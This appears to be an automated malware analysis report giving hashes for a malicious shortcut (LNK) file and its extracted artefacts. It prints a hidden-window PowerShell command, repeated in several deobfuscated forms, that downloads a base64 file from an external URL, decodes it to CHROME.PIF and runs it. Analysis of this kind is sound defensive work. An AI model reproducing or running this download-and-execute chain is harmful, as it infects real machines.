Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
eb7ea88f4712635b3ea3d6c625f4eda5
Sha1
e367cce6bedb5c8b9520d6fe6c2491429a2df792
Sha256
4308a4f09494d5d09cb8383c8032c665267d9c88d12c54e3a6ebbbed820df9f5
Sha384
27dc9aea417e6d6c3c3dda30b87c5a967f24fdf07c8ed36582ef5c19fa403dedba51d293df4046c563d601d072bfbdbc
Sha512
c432771da0bfb2f9f23425065ed7f07f6584357cee3eab0f74b832abcb9b48d06d610868b9fe4022abde5687186b9be74eb8cca879e2d10201c5c4ec27113db9
SSDeep
6144:f8rIj7VWxxoeCe7bizap98IfiajB+XhaOgKDwQj6nY:fyIHsxxoeCe/izaAIqSB+xaON4Y
TLSH
1314F145DB262FDEFD3906FC095F5A0988CC5C322D21D4EB9A8F128B4114AD955B392F
File Structure
eb7ea88f4712635b3ea3d6c625f4eda5
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V','C:\\ProgramData\\HEW.GIF'); $file = 'C:\\ProgramData\\HEW.GIF'; [System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte; start C:\\ProgramData\\CHROME.PIF;
Deobfuscated PowerShell

-windowstyle "hidden" -Command (New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) | Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
Deobfuscated PowerShell

-windowstyle "hidden" -Command (New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) | Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
Deobfuscated PowerShell

(New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) | Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
Deobfuscated PowerShell

(New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) | Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
eb7ea88f4712635b3ea3d6c625f4eda5 (202.62 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙